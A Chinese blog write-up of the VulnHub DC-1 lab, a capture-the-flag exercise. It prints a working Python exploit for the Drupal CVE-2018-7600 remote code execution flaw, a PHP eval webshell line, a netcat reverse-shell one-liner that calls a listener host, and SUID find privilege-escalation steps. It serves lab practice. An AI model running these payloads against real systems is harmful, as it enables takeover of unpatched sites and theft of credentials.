DC-1靶场(CVE-2018-7600)

最新推荐文章于 2023-08-09 15:55:32 发布
最新推荐文章于 2023-08-09 15:55:32 发布
阅读量1.8k 收藏 5
点赞数
分类专栏: web安全 文章标签: html php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/120772550
版权

1.下载DC-1靶场:

DC-1下载地址icon-default.png?t=L9C2https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。

3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。

是一个Drupal CMS。

4.先挂扫描器走一波。

发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。

poc如下:

 

 漏洞存在,验证 poc:

#!/usr/bin/env python3

"""
Written by Christian Mehlmauer
  https://firefart.at/
  https://twitter.com/_FireFart_
  https://github.com/FireFart
This script can be obtained from:
  https://github.com/FireFart/CVE-2018-7600
Requirements:
  - python3
  - python requests (pip install requests)
Usage:
  - Install dependencies
  - modify the HOST variable in the script
  - run the code
  - win
"""
#CVE-2018-7600 exploit
import requests
import re

HOST="http://192.168.0.119/"
order = input('输入执行的命令:')
get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':order, 'name[#type]':'markup'}
#print(get_params)
post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
r = requests.post(HOST, data=post_params, params=get_params)

m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
if m:
    found = m.group(1)
    get_params = {'q':'file/ajax/name/#value/' + found}
    post_params = {'form_build_id':found}
    r = requests.post(HOST, data=post_params, params=get_params)
    print(r.text)

可以写入webshell或者下载webshell。

ehco "<?php @eval($_POST["cmd"]);?>" > 2.php

 但是好像$符号和post被过滤了,但是phpinfo可以写入,应该是漏洞的问题。

 先反弹shell再下载webshell可行。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.8 8888 > /tmp/f

 

连接ok,之后看到第一个flag1.txt,然后提示下一个flag在配置文件中,配置文件在/var/www/sites/default/settings.php

 

 在/home目录看到了flag4,查看

l

 提示要获取root权限在下一个flag,那就提权呗,提权的方式很多,这次用SUID,可以在执行命令的时间获取root权限。

SUID提权方式大全icon-default.png?t=L9C2https://gtfobins.github.io/

find / -perm -u=s -type f 2>/dev/null

 

使用find命令提权。

 

最后一个flag到手。

第三个flag在管理员页面,在设置页面有mysql的密码:

连接一下,并且生成一下admin的hash值并写入mysql。

 

 

 

登入管理员并且发现最后一个flag3

 

 

 

lionwerson
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-7600
03-31
CVE-2018-7600
NCNIPC-靶场介绍&&Django SQL注入(CVE-2021-35042)
03-01 2321
NCNIPC-中国科学院研究生院国家计算机网络入侵防范中心 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息安全管理办公室(以下简称国信安办)的依靠力量,承担和协调国内各种黑客事件的防范处理,协助国信安办完成关键部分的应急处理任务,协助解决社会上的应急/救援组织难以解决的网络安全疑难问题,是国家计算机网络应急处理体系中心的重要部门。 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息
(环境搭建+复现) CVE-2019-6341 Drupal XSS漏洞
daxi0ng的博客
03-20 2429
CVE编号】 CVE-2019-6341 【漏洞名称】 Drupal XSS漏洞 1【靶标分类】 Web类型类靶标 2【影响版本】 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 3【漏洞分类】 XSS 4【漏洞等级】 中 5【漏洞简介】 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...
Drupal Drupalgeddon 2远程执行代码漏洞RCE(CVE-2018-7600漏洞复现
ADummy的博客
02-23 880
Drupal Drupalgeddon 2远程执行代码漏洞CVE-2018-7600) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显—>getshell 0x01漏洞介绍 ​ 7.58之前的Drupal,8.3.9之前的8.x,8.4.6之前的8.4.x和8.5.1之前的8.5.x允许远程攻击者执行任意代码,因为该问题会影响具有默认或通用模块配置的多个子系统,包括表单API。。 影响版本 Drupal < 7.58 Drupal < 8.3
DC系列】DC-1靶场
qq_51611948的博客
02-06 965
DC靶场序列-DC1
DC: 1
箭雨镜屋
06-13 536
渗透思路:nmap扫描----利用Drupal 7的RCE(CVE-2018-7600)getshell----python反弹shell----非渗透路径:Drupal配置文件中找到数据库用户名密码----非渗透路径:数据库中找到flag3、/home/flag4下发现flag4----suid权限的find命令提权...
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
【安全】vulnhub实验dc1
qq_43017750的博客
12-23 2533
靶机下载链接:https://download.vulnhub.com/dc/DC-1.zip 主机发现 首先使用nmap发现网络中存活的主机 发现了目标主机192.168.56.101 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sP -sn -n -T4 --host-timeout 5 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2495
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Pikachu漏洞靶场的简介、下载与安装
热门推荐
WX公众号-小白学安全
04-01 1万+
文章目录简介 简介 pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞 Burt Force(暴力**漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsafe file downloads(不安全的文件下载) Unsafe file uploads(不安全的文件上传) Over Permisson(越权漏洞) …/…/…/(目录遍历) I can se
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4651
dc-9靶场详细渗透过程
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现
yzl_007的博客
08-09 806
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现 漏洞描述 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 使用vulhub镜像环境docker-compose up -d 成
Drupal-CVE-2018-7600漏洞复现
m0_62008601的博客
08-04 823
Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞,Drupal 对 Form API (FAPI) AJAX 请求的输入卫生不足。接下来进行漏洞利用,参考https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py,通过bp抓包,直接抓取这个页面的数据包(安装完drupal是登录状态的话需退出登录才能访问到这个页面)启动环境之后,浏览器进行访问,看到是drupal的安装页面,一路默认配置下一步安装。.
vulnhub-DC-1渗透测试
遇事不决冲冲冲
11-21 6374
环境搭建 官网https://download.vulnhub.com/dc/DC-1.zip 将ova直接拖到vmware中,第一次还是失败重试后成功 刚开始遇到了点小问题,环境搭建好后利用kali nmap扫不到,并且启动靶机时一直报驱动的错。解决方法就是将桥接模式换成NAT模式(“桥接”和“NAT”方式区别),然后移除CD/DVD(IDE) 思路 首先nmap扫描ip地址及端口号,进入web页面发现一个7版本的Drupal,利用msf中已存的漏洞可以直接打进去并且发现flag1并且提示配置文件,通过
Vulnhub系列之DC1靶场详解
最新发布
weixin_54960572的博客
08-09 313
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值